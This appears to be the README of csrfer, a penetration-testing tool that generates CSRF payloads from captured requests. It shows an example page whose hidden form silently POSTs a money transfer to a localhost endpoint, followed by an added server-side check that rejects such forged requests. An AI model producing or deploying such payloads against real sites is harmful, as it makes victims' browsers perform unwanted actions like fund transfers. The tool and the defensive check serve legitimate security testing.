
csrfer's Introduction

CSRFER


 _____  _________________ ___________ 
/  __ \/  ___| ___ \  ___|  ___| ___ \
| /  \/\ `--.| |_/ / |_  | |__ | |_/ /
| |     `--. \    /|  _| |  __||    / 
| \__/\/\__/ / |\ \| |   | |___| |\ \ 
 \____/\____/\_| \_\_|   \____/\_| \_|
                                      
          -.--.
          )  " '-,
          ',' 2  \_
           \q \ .  \
        _.--'  '----.__
       /  ._      _.__ \__
    _.'_.'  \_ .-._\_ '-, }
   (,/ _.---;-(  . \ \   ~
 ____ (  .___\_\  \/_/
(      '-._ \   \ |
 '._       ),> _) >
    '-._ c='  Cooo  -._
        '-._           '.
            '-._         `\
       snd      '-._       '.
                    '-._     \
                        `~---'

CSRFER is a tool that generates CSRF payloads from vulnerable requests.

It parses the supplied request and generates either an HTML form or a fetch request. The payload can then be embedded in an HTML template.

Installation

npm install -g csrfer

Usage:

Usage: csrfer [options]

Options:
  --version              Show version number
  -r, --request          Path to the request file to be used
  -m, --mode             Mode to generate the code. Available options: form, fetch. (Default is form)
  -a, --autosubmit       Auto submit the request on page load
  -s, --show             Show the form inputs (only for form mode)
  -o, --output           Output the payload to the specified file instead of STDOUT
  -t, --template         Path to an html template page. Use the placeholder {{CONTENT}} to specify where to
                         inject the code (in html, not JS)
  -T, --defaulttemplate  Use this option if you want the code to be injected into a default html page.
  -h, --help             Show help

Examples:
  csrfer -r req.txt -m form -a                    Automatically submit a form request
  csrfer -r req.txt -m form -s                    Generate and shows a form to be submitted manually
  csrfer -r req.txt -m fetch -t my_template.html  Generates a fetch request and uses the supplied template
                                                  page

Example output

<!DOCTYPE html>
<html>

<head>
  <title>This is Hello World page</title>
</head>

<body>
  <h1>Hello World</h1>

  <form id="csrf" name="csrf" action="http://localhost:8000/1.php" method="POST"
    enctype="application/x-www-form-urlencoded"><input id='destination' name='destination' type='hidden'
      value='123-123123-123' /><br><input id='amount' name='amount' type='hidden' value='50&#x20AC;' /><br><input
      type='submit' value='submit'></form>
</body>

</html>
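
A server that verifies the request's origin and a per-session token rejects the form shown in the example output. The check below is an added example, not part of csrfer or its output; the function names, the csrf_token field, the trusted-origin list and the sample requests are assumptions constructed for illustration.

```javascript
// Added example, not part of csrfer. All names and sample values are constructed.
const TRUSTED_ORIGINS = new Set(['http://localhost:8000']); // the application's own origin
const STATE_CHANGING = new Set(['POST', 'PUT', 'PATCH', 'DELETE']);

// Compare the session token with the submitted one without an early exit.
function tokensMatch(expected, supplied) {
  if (typeof expected !== 'string' || typeof supplied !== 'string') return false;
  if (expected.length === 0 || expected.length !== supplied.length) return false;
  let diff = 0;
  for (let i = 0; i < expected.length; i++) {
    diff |= expected.charCodeAt(i) ^ supplied.charCodeAt(i);
  }
  return diff === 0;
}

// Returns null if the request may proceed, otherwise the reason it is rejected.
// req: { method, headers (lower-case keys), body (parsed form fields), session }
function csrfRejectReason(req) {
  if (!STATE_CHANGING.has(req.method)) return null;
  const site = req.headers['sec-fetch-site'];
  if (site && site !== 'same-origin' && site !== 'none') return 'cross-site fetch metadata';
  const origin = req.headers['origin'];
  if (origin && !TRUSTED_ORIGINS.has(origin)) return 'untrusted origin';
  // Both headers can be absent (older clients), so the token is always required.
  if (!tokensMatch(req.session.csrfToken, req.body.csrf_token)) return 'missing or wrong token';
  return null;
}

// Constructed sample requests.
const session = { csrfToken: 'constructed-token-4f9a2c' };
const forgedForm = { // what the form in the example output submits from another site
  method: 'POST',
  headers: { origin: 'http://other.example', 'sec-fetch-site': 'cross-site' },
  body: { destination: '123-123123-123', amount: '50\u20AC' },
  session,
};
const forgedNoHeaders = { ...forgedForm, headers: {} }; // client sending neither header
const legitimate = {
  method: 'POST',
  headers: { origin: 'http://localhost:8000', 'sec-fetch-site': 'same-origin' },
  body: { ...forgedForm.body, csrf_token: session.csrfToken },
  session,
};

for (const [name, req] of Object.entries({ forgedForm, forgedNoHeaders, legitimate })) {
  console.log(name, '->', csrfRejectReason(req) ?? 'accepted');
}
```

The token check is what still rejects the request when a client sends neither Origin nor Sec-Fetch-Site.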

License

This project is MIT licensed

csrfer's People

Contributors

luisfontes19
